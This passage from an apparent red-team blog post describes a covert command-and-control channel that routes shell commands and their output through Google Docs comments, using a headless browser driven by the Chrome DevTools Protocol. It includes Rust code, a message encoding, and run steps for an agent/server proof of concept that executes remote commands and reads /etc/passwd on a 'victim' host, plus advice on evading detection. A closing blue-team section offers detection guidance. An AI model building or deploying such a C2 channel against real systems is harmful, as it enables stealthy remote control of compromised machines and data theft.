Reading comments from the document
Next, we want to read the comments from the document. We need this functionality to receive commands from the C2 server and on the server side to receive the output of the commands executed by the agent.
Reading all comments from the document is quite straightforward because all comments are stored in a div with the class docos-replyview-body. Using the CDP, we can find all elements with this class and read the text of the comments:
let mut comments = Vec::new();
for comment in page
.find_elements("div.docos-replyview-body")
.await?
.into_iter()
{
if let Some(comment) = comment.inner_text().await? {
comments.push(comment);
}
}
This is also implemented in src/lib.rs. An example of how to use the library to read all comments from the document can be found in examples/read_comments.rs and can be run using the following command:
$ cargo run --example read_comments
Finished `dev` profile [unoptimized + debuginfo] target(s) in 0.11s
[examples/read_comments.rs:11:5] c2.read_all_comments().await? = [
"Hello, World!",
]
We can see that the comment “Hello, World!” that we added earlier is returned by the function.
Encoding data in comments
Now that we have the necessary abstractions to send and receive data “through” the document, we need to specify an encoding that the agent and the server will use to encode and decode the data.
For this PoC, we will be executing shell commands on the agent and returning the output to the server, so not much encoding is required. We only need a way to indicate if a comment is a command or the output of a command. In production, you would probably want to use a more sophisticated encoding and layer some kind of public key cryptography on top of it to ensure that only the C2 server can issue commands (with the corresponding private key) and that only the server can read the output of the commands (encrypted with the public key).
All messages are hex encoded. The first byte of the message indicates if the message is a command (0x01) or the output of a command (0x02). The next 12 bytes of the message are the message ID, which is used to match the output of a command to the command itself. The 0x01 (command) message is then followed by the command, and the 0x02 (output) message is followed by the output of the command with the corresponding message ID. We also add a third message type, 0x03, which is used to indicate that the agent should exit.
All in all, the encoding is specified by these Rust types with some convenience functions to encode and decode the messages implemented in src/shell.rs:
#[repr(u8)]
#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord, Hash)]
pub enum MessageType {
Command = 0x01,
Output = 0x02,
Exit = 0x03,
}
#[derive(Debug, Clone, PartialEq, Eq, PartialOrd, Ord, Hash)]
pub struct Message {
pub message_type: MessageType,
pub message_id: [u8; 12],
pub message: String,
}
Putting it all together
We now have the required abstractions to interact with Google Docs using the CDP and have defined an encoding for the messages. Let’s put it all together to create an agent and server pair that can be used to execute shell commands on the agent and receive the output of the commands.
The agent starts a headless browser and then enters a loop where it reads comments from the document, decodes them, executes the command, and then writes the output of the command back to the document.
The server asks the operator for a command, encodes it, and then writes it to the document. It will then wait for the output of the command, decode it, and print it to the operator. It also can send the special 0x03 message to the agent to make it exit. We also added a few utility functions, such as clearing all comments from the document and displaying all already present comments.
The full code for the agent and server can be found in the examples directory of the repository, in shell_agent.rs and shell_server.rs respectively.
To run the example:
- Clone the repository (git clone https://github.com/cirosec/google-doc2).
- Create a new Google Docs document and share it with the “Anyone with the link can edit” permission.
- Type some text in the document so that it is not empty. If you want, you can keep the document open in your normal browser to see the comments being added.
- Set the “DOCS_URL” environment variable to the URL of the document and run the agent:
$ export DOCS_URL="https://docs.google.com/document/d/XXXXX/edit?usp=sharing"
$ cargo run --example shell_agent
Finished `dev` profile [unoptimized + debuginfo] target(s) in 0.11s
Running `target/debug/examples/shell_agent
- Run the server in another terminal and execute some commands, in this case hostname and cat /etc/passwd | head:
$ export DOCS_URL="https://docs.google.com/document/d/XXXXX/edit?usp=sharing"
$ cargo run --example shell_server
Finished `dev` profile [unoptimized + debuginfo] target(s) in 0.11s
Successfully opened Google Docs!
Choose an action: Submit a new command
Enter a command: hostname
-> victim
Choose an action: Submit a new command
Enter a command: cat /etc/passwd | head
-> root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
Choose an action: Exit
As you can see, the server is able to send commands to the agent and receive the output of the commands. The agent is able to execute the commands and send the output back to the server.
Blue Team Perspective
All C2 traffic generated by this technique is sent out by an unmodified browser executable. In the case of Microsoft Edge, the executable is even signed by Microsoft! This makes it very difficult for blue teamers to detect that something is up and even if someone notices the channel, all traffic is sent “encoded” through the Google Docs API, which is not very straightforward to understand. As an example, here’s the POST request apparently responsible for adding a comment to the document:
POST /document/d/XXXXXXXX/docos/p/sync?id=XXXXXXXX&reqid=3&sid=XXXXXXXX&vc=1&c=1&w=1&flr=0&smv=52&smb=XXX
&token=XXXXX&includes_info_params=true&cros_files=false HTTP/2
Host: docs.google.com
[...]
p=%5B%5B%5B%22XXXXXXXX%22,%5Bnull,null,%5B%22text/html%22,%22
test%20comment%22%5D,%5B%22text/plain%22,%22test%20comment%22%5D,%5B%22
Anonym%22,null,%22//ssl.gstatic.com/docs/common/blue_silhouette96-0.png%22,%22ANONYMOUS_105250506097979753968%22,1%5D,1712922484034,1712922484034,
null,%5B%22text/plain%22,%22Hello,%20world!aa%22%5D,null,%22XXXXXXXX%22,1%5D,1712922484034,
null,null,null,null,%22kix.290cok7o9jiy%22,1%5D%5D,1712921888390%5D
The comment text is in there, but from a blue team perspective it seems very difficult to figure out what is going on based on that traffic alone, especially if the comment text is encrypted and obfuscated before being added to the document.
Additionally, this technique may be used with any other service that provides similar functionality as Google Docs. To detect this behavior more generally, we can instead focus on the way the Chromium instance is launched by the agent. Of course, this differs from normal execution of Chromium because the executable is started at least with the two flags –remote-debugging-port=0 and –headless we discussed earlier. In actuality, the library uses a lot more arguments, but only these two are strictly necessary. Therefore, if you’d like to build alerting for this type of C2 channel, we’d recommend setting up alerts on processes of Chromium-based browsers (so Chromium, Chrome, Edge, Brave and the like) with any of these two flags present. During normal operation of Chromium, we haven’t seen any uses of these flags, but they are not technically malicious themselves and may be used by developers when running automated tests on web applications, so you might need to configure allowlists for developer machines as necessary.
Conclusion
In this article, we demonstrated that it is to use a headless browser, normally already present on the target system, as a proxy for C2 communication. For the PoC we used Google Docs, but hopefully it is clear that any website can be used as a C2 proxy, as long as it can be used to transmit and receive data using the CDP. All the code for the PoC can be found on GitHub.
In practice, this technique should be built upon to add more sophisticated encoding, asymmetric encryption and customize the website used to fit the scenario of the red team engagement. For example, the website could be a company-internal website, which would make it even less likely to be blocked by any firewall or proxy.